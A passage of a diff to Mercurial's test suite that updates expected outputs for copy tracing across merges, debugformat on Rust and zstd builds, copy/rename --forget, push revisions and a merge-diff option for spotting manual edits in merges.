$ hg status --copies --rev 'desc("c-1")' --rev 'desc("mCH-delete-before-conflict-m")'
A d
b
@@ -1749,6 +3236,586 @@
b
R b
$ hg status --copies --rev 'desc("h-1")' --rev 'desc("mCH-delete-before-conflict-m")'
+ A t
+ p
R a
+ R p
$ hg status --copies --rev 'desc("h-1")' --rev 'desc("mHC-delete-before-conflict-m")'
+ A t
+ p
R a
+ R p
+
+Variant of previous with extra changes introduced by the merge
+--------------------------------------------------------------
+
+(see case declaration for details)
+
+Subcase: merge has same initial content on both side, but merge introduced a change
+```````````````````````````````````````````````````````````````````````````````````
+
+- the "e-" branch renaming b to f (through 'g')
+- the "a-" branch renaming d to f (through e)
+- the merge add new change to b
+
+ $ hg log -G --rev '::(desc("mAE-change-m")+desc("mEA-change-m"))'
+ o mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - the other way
+ |\
+ +---o mAE-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - one way
+ | |/
+ | o e-2 g -move-> f
+ | |
+ | o e-1 b -move-> g
+ | |
+ o | a-2: e -move-> f
+ | |
+ o | a-1: d -move-> e
+ |/
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+#if no-changeset
+ $ hg manifest --debug --rev 'desc("mAE-change-m-0")' | grep '644 f'
+ 2f649fba7eb284e720d02b61f0546fcef694c045 644 f
+ $ hg manifest --debug --rev 'desc("mEA-change-m-0")' | grep '644 f'
+ 774e7c1637d536b99e2d8ef16fd731f87a82bd09 644 f
+ $ hg manifest --debug --rev 'desc("a-2")' | grep '644 f'
+ b76eb76580df486c3d51d63c5c210d4dd43a8ac7 644 f
+ $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f'
+ e8825b386367b29fec957283a80bb47b47483fe1 644 f
+ $ hg debugindex f | ../no-linkrev
+ rev linkrev nodeid p1 p2
+ 0 * b76eb76580df 000000000000 000000000000
+ 1 * e8825b386367 000000000000 000000000000
+ 2 * 2ff93c643948 b76eb76580df e8825b386367
+ 3 * 2f649fba7eb2 b76eb76580df e8825b386367
+ 4 * 774e7c1637d5 e8825b386367 b76eb76580df
+#else
+ $ hg manifest --debug --rev 'desc("mAE-change-m-0")' | grep '644 f'
+ d3613c1ec8310a812ac4268fd853ac576b6caea5 644 f
+ $ hg manifest --debug --rev 'desc("mEA-change-m-0")' | grep '644 f'
+ 05e03c868bbcab4a649cb33a238d7aa07398a469 644 f
+ $ hg manifest --debug --rev 'desc("a-2")' | grep '644 f'
+ ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f
+ $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f'
+ ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f
+ $ hg debugindex f | ../no-linkrev
+ rev linkrev nodeid p1 p2
+ 0 * ae258f702dfe 000000000000 000000000000
+ 1 * d3613c1ec831 ae258f702dfe 000000000000
+ 2 * 05e03c868bbc ae258f702dfe 000000000000
+#endif
+
+# Here the filelog based implementation is not looking at the rename
+# information (because the file exist on both side). However the changelog
+# based on works fine. We have different output.
+
+ $ hg status --copies --rev 'desc("a-2")' --rev 'desc("mAE-change-m-0")'
+ M f
+ b (no-filelog !)
+ R b
+ $ hg status --copies --rev 'desc("a-2")' --rev 'desc("mEA-change-m-0")'
+ M f
+ b (no-filelog !)
+ R b
+ $ hg status --copies --rev 'desc("e-2")' --rev 'desc("mAE-change-m-0")'
+ M f
+ d (no-filelog !)
+ R d
+ $ hg status --copies --rev 'desc("e-2")' --rev 'desc("mEA-change-m-0")'
+ M f
+ d (no-filelog !)
+ R d
+ $ hg status --copies --rev 'desc("i-2")' --rev 'desc("a-2")'
+ A f
+ d
+ R d
+ $ hg status --copies --rev 'desc("i-2")' --rev 'desc("e-2")'
+ A f
+ b
+ R b
+
+# From here, we run status against revision where both source file exists.
+#
+# The filelog based implementation picks an arbitrary side based on revision
+# numbers. So the same side "wins" whatever the parents order is. This is
+# sub-optimal because depending on revision numbers means the result can be
+# different from one repository to the next.
+#
+# The changeset based algorithm use the parent order to break tie on conflicting
+# information and will have a different order depending on who is p1 and p2.
+# That order is stable accross repositories. (data from p1 prevails)
+
+ $ hg status --copies --rev 'desc("i-2")' --rev 'desc("mAE-change-m-0")'
+ A f
+ d
+ R b
+ R d
+ $ hg status --copies --rev 'desc("i-2")' --rev 'desc("mEA-change-m-0")'
+ A f
+ d (filelog !)
+ b (no-filelog !)
+ R b
+ R d
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE-change-m-0")'
+ A f
+ a
+ A t
+ p
+ R a
+ R b
+ R p
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA-change-m-0")'
+ A f
+ a (filelog !)
+ b (no-filelog !)
+ A t
+ p
+ R a
+ R b
+ R p
+
+
+Subcase: merge overwrite common copy information, but with extra change during the merge
+```````````````````````````````````````````````````````````````````````````````````
+
+Merge:
+- one with change to an unrelated file (b)
+- one overwriting a file (d) with a rename (from h to i to d)
+
+ $ hg log -G --rev '::(desc("mBF-change-m")+desc("mFB-change-m"))'
+ o mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way
+ |\
+ +---o mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way
+ | |/
+ | o f-2: rename i -> d
+ | |
+ | o f-1: rename h -> i
+ | |
+ o | b-1: b update
+ |/
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBF-change-m-0")'
+ M b
+ A d
+ h (filelog !)
+ h (sidedata !)
+ h (upgraded !)
+ h (upgraded-parallel !)
+ h (changeset !)
+ h (compatibility !)
+ A t
+ p
+ R a
+ R h
+ R p
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFB-change-m-0")'
+ M b
+ A d
+ h
+ A t
+ p
+ R a
+ R h
+ R p
+ $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBF-change-m-0")'
+ M d
+ h (no-filelog !)
+ R h
+ $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mBF-change-m-0")'
+ M b
+ M d
+ $ hg status --copies --rev 'desc("f-1")' --rev 'desc("mBF-change-m-0")'
+ M b
+ M d
+ i (no-filelog !)
+ R i
+ $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mFB-change-m-0")'
+ M d
+ h (no-filelog !)
+ R h
+ $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mFB-change-m-0")'
+ M b
+ M d
+ $ hg status --copies --rev 'desc("f-1")' --rev 'desc("mFB-change-m-0")'
+ M b
+ M d
+ i (no-filelog !)
+ R i
+
+#if no-changeset
+ $ hg log -Gfr 'desc("mBF-change-m-0")' d
+ o mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way
+ |\
+ o : f-2: rename i -> d
+ | :
+ o : f-1: rename h -> i
+ :/
+ o i-0 initial commit: a b h p q r
+
+#else
+BROKEN: `hg log --follow <file>` relies on filelog metadata to work
+ $ hg log -Gfr 'desc("mBF-change-m-0")' d
+ o mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way
+ :
+ o i-2: c -move-> d, s -move-> t
+ |
+ ~
+#endif
+
+#if no-changeset
+ $ hg log -Gfr 'desc("mFB-change-m-0")' d
+ o mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way
+ |\
+ o : f-2: rename i -> d
+ | :
+ o : f-1: rename h -> i
+ :/
+ o i-0 initial commit: a b h p q r
+
+#else
+BROKEN: `hg log --follow <file>` relies on filelog metadata to work
+ $ hg log -Gfr 'desc("mFB-change-m-0")' d
+ o mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way
+ :
+ o i-2: c -move-> d, s -move-> t
+ |
+ ~
+#endif
+
+
+Subcase: restoring and untouched deleted file, while touching it
+````````````````````````````````````````````````````````````````
+
+Merge:
+- one removing a file (d)
+- one leaving the file untouched
+- the merge actively restore the file to the same content.
+
+In this case, the file keep on living after the merge. So we should not drop its
+copy tracing chain.
+
+ $ hg log -G --rev '::(desc("mCB-change-m")+desc("mBC-change-m"))'
+ o mBC-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way
+ |\
+ +---o mCB-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way
+ | |/
+ | o c-1 delete d
+ | |
+ o | b-1: b update
+ |/
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+
+'a' is the the copy source of 'd'
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCB-change-m-0")'
+ M b
+ A d
+ a (no-compatibility no-changeset !)
+ A t
+ p
+ R a
+ R p
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC-change-m-0")'
+ M b
+ A d
+ a (no-compatibility no-changeset !)
+ A t
+ p
+ R a
+ R p
+ $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mCB-change-m-0")'
+ M b
+ A d
+ $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mBC-change-m-0")'
+ M b
+ A d
+ $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mCB-change-m-0")'
+ M d
+ $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBC-change-m-0")'
+ M d
+
+
+Decision from previous merge are properly chained with later merge
+------------------------------------------------------------------
+
+
+Subcase: chaining conflicting rename resolution
+```````````````````````````````````````````````
+
+The "mAEm" and "mEAm" case create a rename tracking conflict on file 'f'. We
+add more change on the respective branch and merge again. These second merge
+does not involve the file 'f' and the arbitration done within "mAEm" and "mEA"
+about that file should stay unchanged.
+
+The result from mAEm is the same for the subsequent merge:
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAEm")' f
+ A f
+ a (filelog !)
+ a (sidedata !)
+ a (upgraded !)
+ a (upgraded-parallel !)
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE,Km")' f
+ A f
+ a (filelog !)
+ a (sidedata !)
+ a (upgraded !)
+ a (upgraded-parallel !)
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mK,AEm")' f
+ A f
+ a (filelog !)
+ a (sidedata !)
+ a (upgraded !)
+ a (upgraded-parallel !)
+
+
+The result from mEAm is the same for the subsequent merge:
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEAm")' f
+ A f
+ a (filelog !)
+ b (sidedata !)
+ b (upgraded !)
+ b (upgraded-parallel !)
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA,Jm")' f
+ A f
+ a (filelog !)
+ b (sidedata !)
+ b (upgraded !)
+ b (upgraded-parallel !)
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mJ,EAm")' f
+ A f
+ a (filelog !)
+ b (sidedata !)
+ b (upgraded !)
+ b (upgraded-parallel !)
+
+Subcase: chaining conflicting rename resolution
+```````````````````````````````````````````````
+
+The "mPQm" and "mQPm" case create a rename tracking conflict on file 'v'. We
+add more change on the respective branch and merge again. These second merge
+does not involve the file 'v' and the arbitration done within "mPQm" and "mQP"
+about that file should stay unchanged.
+
+The result from mPQm is the same for the subsequent merge:
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mPQm")' v
+ A v
+ r (filelog !)
+ p (sidedata !)
+ p (upgraded !)
+ p (upgraded-parallel !)
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mPQ,Tm")' v
+ A v
+ r (filelog !)
+ p (sidedata !)
+ p (upgraded !)
+ p (upgraded-parallel !)
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mT,PQm")' v
+ A v
+ r (filelog !)
+ p (sidedata !)
+ p (upgraded !)
+ p (upgraded-parallel !)
+
+
+The result from mQPm is the same for the subsequent merge:
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mQPm")' v
+ A v
+ r (no-changeset no-compatibility !)
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mQP,Sm")' v
+ A v
+ r (no-changeset no-compatibility !)
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mS,QPm")' v
+ A v
+ r (filelog !)
+ r (sidedata !)
+ r (upgraded !)
+ r (upgraded-parallel !)
+
+
+Subcase: chaining salvage information during a merge
+````````````````````````````````````````````````````
+
+We add more change on the branch were the file was deleted. merging again
+should preserve the fact eh file was salvaged.
+
+reference output:
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCB-revert-m-0")'
+ M b
+ A d
+ a (no-changeset no-compatibility !)
+ A t
+ p
+ R a
+ R p
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC-revert-m-0")'
+ M b
+ A d
+ a (no-changeset no-compatibility !)
+ A t
+ p
+ R a
+ R p
+
+chained output
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC+revert,Lm")'
+ M b
+ A d
+ a (no-changeset no-compatibility !)
+ A t
+ p
+ A unrelated-l
+ R a
+ R p
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCB+revert,Lm")'
+ M b
+ A d
+ a (no-changeset no-compatibility !)
+ A t
+ p
+ A unrelated-l
+ R a
+ R p
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mL,BC+revertm")'
+ M b
+ A d
+ a (no-changeset no-compatibility !)
+ A t
+ p
+ A unrelated-l
+ R a
+ R p
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mL,CB+revertm")'
+ M b
+ A d
+ a (no-changeset no-compatibility !)
+ A t
+ p
+ A unrelated-l
+ R a
+ R p
+
+Subcase: chaining "merged" information during a merge
+``````````````````````````````````````````````````````
+
+When a non-rename change are merged with a copy overwrite, the merge pick the copy source from (p1) as the reference. We should preserve this information in subsequent merges.
+
+
+reference output:
+
+ (for details about the filelog pick, check the mFGm/mGFm case)
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFGm")' d
+ A d
+ a (filelog !)
+ h (sidedata !)
+ h (upgraded !)
+ h (upgraded-parallel !)
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGFm")' d
+ A d
+ a (filelog !)
+ a (sidedata !)
+ a (upgraded !)
+ a (upgraded-parallel !)
+
+Chained output
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mO,FGm")' d
+ A d
+ a (filelog !)
+ h (sidedata !)
+ h (upgraded !)
+ h (upgraded-parallel !)
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFG,Om")' d
+ A d
+ a (filelog !)
+ h (sidedata !)
+ h (upgraded !)
+ h (upgraded-parallel !)
+
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGF,Nm")' d
+ A d
+ a (no-changeset no-compatibility !)
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mN,GFm")' d
+ A d
+ a (no-changeset no-compatibility !)
+
+
+Subcase: chaining conflicting rename resolution, with extra change during the merge
+```````````````````````````````````````````````````````````````````````````````````
+
+The "mAEm" and "mEAm" case create a rename tracking conflict on file 'f'. We
+add more change on the respective branch and merge again. These second merge
+does not involve the file 'f' and the arbitration done within "mAEm" and "mEA"
+about that file should stay unchanged.
+
+The result from mAEm is the same for the subsequent merge:
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE-change-m")' f
+ A f
+ a (filelog !)
+ a (sidedata !)
+ a (upgraded !)
+ a (upgraded-parallel !)
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE-change,Km")' f
+ A f
+ a (filelog !)
+ a (sidedata !)
+ a (upgraded !)
+ a (upgraded-parallel !)
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mK,AE-change-m")' f
+ A f
+ a (no-changeset no-compatibility !)
+
+
+The result from mEAm is the same for the subsequent merge:
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA-change-m")' f
+ A f
+ a (filelog !)
+ b (sidedata !)
+ b (upgraded !)
+ b (upgraded-parallel !)
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA-change,Jm")' f
+ A f
+ a (filelog !)
+ b (sidedata !)
+ b (upgraded !)
+ b (upgraded-parallel !)
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mJ,EA-change-m")' f
+ A f
+ a (filelog !)
+ b (sidedata !)
+ b (upgraded !)
+ b (upgraded-parallel !)
--- a/tests/test-copies-in-changeset.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-copies-in-changeset.t Tue Apr 20 11:01:06 2021 -0400
@@ -39,11 +39,13 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: yes yes no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: yes yes no
+ revlog-v2: yes yes no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
#else
$ hg debugformat -v
@@ -53,11 +55,13 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: no no no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: no no no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
#endif
$ echo a > a
@@ -345,7 +349,10 @@
$ hg co -q 0
$ hg mv a b
$ hg ci -qm 'rename a to b'
- $ hg rebase -d 1 --config rebase.experimental.inmemory=yes
+Not only do we want this to run in-memory, it shouldn't fall back to
+on-disk merge (no conflicts), so we force it to be in-memory
+with no fallback.
+ $ hg rebase -d 1 --config rebase.experimental.inmemory=yes --config devel.rebase.force-in-memory-merge=yes
rebasing 2:* tip "rename a to b" (glob)
merging a and b to b
saved backup bundle to $TESTTMP/rebase-rename/.hg/strip-backup/*-*-rebase.hg (glob)
@@ -421,11 +428,13 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: yes yes no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: yes yes no
+ revlog-v2: yes yes no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
$ hg debugsidedata -c -- 0
1 sidedata entries
@@ -447,11 +456,13 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: yes yes no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: yes yes no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
$ hg debugsidedata -c -- 0
1 sidedata entries
@@ -475,11 +486,13 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: yes yes no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: yes yes no
+ revlog-v2: yes yes no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
$ hg debugsidedata -c -- 0
1 sidedata entries
--- a/tests/test-copies.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-copies.t Tue Apr 20 11:01:06 2021 -0400
@@ -93,8 +93,10 @@
x y
$ hg debugp1copies -r 1
x -> y
-Incorrectly doesn't show the rename
$ hg debugpathcopies 0 1
+ x -> y (no-filelog !)
+ $ hg debugpathcopies 0 1 --config devel.copy-tracing.trace-all-files=yes
+ x -> y
Copy a file onto another file with same content. If metadata is stored in changeset, this does not
produce a new filelog entry. The changeset's "files" entry should still list the file.
@@ -111,8 +113,10 @@
x x2
$ hg debugp1copies -r 1
x -> x2
-Incorrectly doesn't show the rename
$ hg debugpathcopies 0 1
+ x -> x2 (no-filelog !)
+ $ hg debugpathcopies 0 1 --config devel.copy-tracing.trace-all-files=yes
+ x -> x2
Rename file in a loop: x->y->z->x
$ newrepo
@@ -374,6 +378,29 @@
$ hg debugpathcopies 1 3
x -> z
+Copy x->y on two separate branches. Pathcopies from one branch to the other
+should not report the copy.
+ $ newrepo
+ $ echo x > x
+ $ hg ci -Aqm 'add x'
+ $ hg cp x y
+ $ hg ci -qm 'copy x to y'
+ $ hg co -q 0
+ $ hg graft 1 -q
+ $ hg l
+ @ 2 copy x to y
+ | y
+ | o 1 copy x to y
+ |/ y
+ o 0 add x
+ x
+ $ hg debugp1copies -r 1
+ x -> y
+ $ hg debugp1copies -r 2
+ x -> y
+ $ hg debugpathcopies 1 2
+ $ hg debugpathcopies 2 1
+
Copy x to y on one side of merge, create y and rename to z on the other side.
$ newrepo
$ echo x > x
--- a/tests/test-copy.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-copy.t Tue Apr 20 11:01:06 2021 -0400
@@ -228,6 +228,17 @@
should show no copies
$ hg st -C
+note: since filelog based copy tracing only trace copy for new file, the copy information here is not displayed.
+
+ $ hg status --copies --change .
+ M bar
+
+They are a devel option to walk all file and fine this information anyway.
+
+ $ hg status --copies --change . --config devel.copy-tracing.trace-all-files=yes
+ M bar
+ foo
+
copy --after on an added file
$ cp bar baz
$ hg add baz
@@ -266,19 +277,25 @@
$ rm baz xyzzy
-Test unmarking copy of a single file
+Test unmarking copy/rename of a single file
# Set up by creating a copy
$ hg cp bar baz
-# Test uncopying a non-existent file
+# Test unmarking as copy a non-existent file
$ hg copy --forget non-existent
non-existent: $ENOENT$
-# Test uncopying an tracked but unrelated file
+ $ hg rename --forget non-existent
+ non-existent: $ENOENT$
+# Test unmarking as copy an tracked but unrelated file
$ hg copy --forget foo
foo: not unmarking as copy - file is not marked as copied
-# Test uncopying a copy source
+ $ hg rename --forget foo
+ foo: not unmarking as copy - file is not marked as copied
+# Test unmarking as copy a copy source
$ hg copy --forget bar
bar: not unmarking as copy - file is not marked as copied
+ $ hg rename --forget bar
+ bar: not unmarking as copy - file is not marked as copied
# baz should still be marked as a copy
$ hg st -C
A baz
@@ -287,17 +304,38 @@
$ hg copy --forget baz
$ hg st -C
A baz
-# Test uncopy with matching an non-matching patterns
+ $ rm bar
+ $ hg rename --after bar baz
+ $ hg st -C
+ A baz
+ bar
+ R bar
+ $ hg rename --forget baz
+ $ hg st -C
+ A baz
+ R bar
+ $ hg revert bar
+# Test unmarking as copy with matching an non-matching patterns
$ hg cp bar baz --after
$ hg copy --forget bar baz
bar: not unmarking as copy - file is not marked as copied
+ $ hg cp bar baz --after
+ $ hg rename --forget bar baz
+ bar: not unmarking as copy - file is not marked as copied
$ hg st -C
A baz
-# Test uncopy with no exact matches
+# Test unmarking as copy with no exact matches
$ hg cp bar baz --after
$ hg copy --forget .
$ hg st -C
A baz
+ $ hg cp bar baz --after
+ $ hg st -C
+ A baz
+ bar
+ $ hg rename --forget .
+ $ hg st -C
+ A baz
$ hg forget baz
$ rm baz
--- a/tests/test-debugcommands.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-debugcommands.t Tue Apr 20 11:01:06 2021 -0400
@@ -186,8 +186,10 @@
node trie capacity: 4
node trie count: 2
node trie depth: 1
- node trie last rev scanned: -1
- node trie lookups: 4
+ node trie last rev scanned: -1 (no-rust !)
+ node trie last rev scanned: 3 (rust !)
+ node trie lookups: 4 (no-rust !)
+ node trie lookups: 2 (rust !)
node trie misses: 1
node trie splits: 1
revs in memory: 3
@@ -368,7 +370,8 @@
7 1
8 1
9 1
- 10 2
+ 10 2 (no-zstd !)
+ 10 1 (zstd !)
11 1
$ hg --config extensions.strip= strip --no-backup -r 1
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
@@ -636,7 +639,6 @@
remote-changegroup
http
https
- rev-branch-cache
stream
v2
@@ -654,8 +656,10 @@
devel-peer-request: pairs: 81 bytes
sending hello command
sending between command
- remote: 463
- remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ remote: 444 (no-rust !)
+ remote: 463 (rust !)
+ remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-rust !)
+ remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,persistent-nodemap,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (rust !)
remote: 1
devel-peer-request: protocaps
devel-peer-request: caps: * bytes (glob)
--- a/tests/test-default-push.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-default-push.t Tue Apr 20 11:01:06 2021 -0400
@@ -137,6 +137,7 @@
$ hg --config 'paths.default:pushrev=notdefined()' push
pushing to file:/*/$TESTTMP/pushurlsource/../pushurldest (glob)
hg: parse error: unknown identifier: notdefined
+ (did you mean nodefromfile?)
[10]
$ hg --config 'paths.default:pushrev=(' push
@@ -146,4 +147,40 @@
^ here)
[10]
+default :pushrev is taking in account
+
+ $ echo babar > foo
+ $ hg ci -m 'extra commit'
+ $ hg up '.^'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ echo celeste > foo
+ $ hg ci -m 'extra other commit'
+ created new head
+ $ cat >> .hg/hgrc << EOF
+ > [paths]
+ > other = file://$WD/../pushurldest
+ > *:pushrev = .
+ > EOF
+ $ hg push other
+ pushing to file:/*/$TESTTMP/pushurlsource/../pushurldest (glob)
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 1 changesets with 1 changes to 1 files
+ $ hg push file://$WD/../pushurldest
+ pushing to file:/*/$TESTTMP/pushurlsource/../pushurldest (glob)
+ searching for changes
+ no changes found
+ [1]
+
+for comparison, pushing everything would give different result
+
+ $ hg push file://$WD/../pushurldest --rev 'all()'
+ pushing to file:/*/$TESTTMP/pushurlsource/../pushurldest (glob)
+ searching for changes
+ abort: push creates new remote head 1616ce7cecc8
+ (merge or see 'hg help push' for details about pushing new heads)
+ [20]
+
$ cd ..
--- a/tests/test-diff-change.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-diff-change.t Tue Apr 20 11:01:06 2021 -0400
@@ -194,4 +194,105 @@
9
10
+merge diff should show only manual edits to a merge:
+
+ $ hg diff --config diff.merge=yes -c 6
+(no diff output is expected here)
+
+Construct an "evil merge" that does something other than just the merge.
+
+ $ hg co ".^"
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ hg merge -r 5
+ merging file.txt
+ 0 files updated, 1 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ echo 11 >> file.txt
+ $ hg ci -m 'merge 8 to y with manual edit of 11' # 7
+ created new head
+ $ hg diff -c 7
+ diff -r 273b50f17c6d -r 8ad85e839ba7 file.txt
+ --- a/file.txt Thu Jan 01 00:00:00 1970 +0000
+ +++ b/file.txt Thu Jan 01 00:00:00 1970 +0000
+ @@ -6,6 +6,7 @@
+ 5
+ 6
+ 7
+ -8
+ +y
+ 9
+ 10
+ +11
+Contrast with the `hg diff -c 7` version above: only the manual edit shows
+up, making it easy to identify changes someone is otherwise trying to sneak
+into a merge.
+ $ hg diff --config diff.merge=yes -c 7
+ diff -r 8ad85e839ba7 file.txt
+ --- a/file.txt Thu Jan 01 00:00:00 1970 +0000
+ +++ b/file.txt Thu Jan 01 00:00:00 1970 +0000
+ @@ -9,3 +9,4 @@
+ y
+ 9
+ 10
+ +11
+
+Set up a conflict.
+ $ hg co ".^"
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ sed -e 's,^8$,z,' file.txt > file.txt.tmp
+ $ mv file.txt.tmp file.txt
+ $ hg ci -m 'conflicting edit: 8 to z'
+ created new head
+ $ echo "this file is new in p1 of the merge" > new-file-p1.txt
+ $ hg ci -Am 'new file' new-file-p1.txt
+ $ hg log -r . --template 'p1 will be rev {rev}\n'
+ p1 will be rev 9
+ $ hg co 5
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ echo "this file is new in p2 of the merge" > new-file-p2.txt
+ $ hg ci -Am 'new file' new-file-p2.txt
+ created new head
+ $ hg log -r . --template 'p2 will be rev {rev}\n'
+ p2 will be rev 10
+ $ hg co -- 9
+ 2 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ hg merge -r 10
+ merging file.txt
+ warning: conflicts while merging file.txt! (edit, then use 'hg resolve --mark')
+ 1 files updated, 0 files merged, 0 files removed, 1 files unresolved
+ use 'hg resolve' to retry unresolved file merges or 'hg merge --abort' to abandon
+ [1]
+ $ hg revert file.txt -r .
+ $ hg resolve -ma
+ (no more unresolved files)
+ $ hg commit -m 'merge conflicted edit'
+Without diff.merge, it's a diff against p1
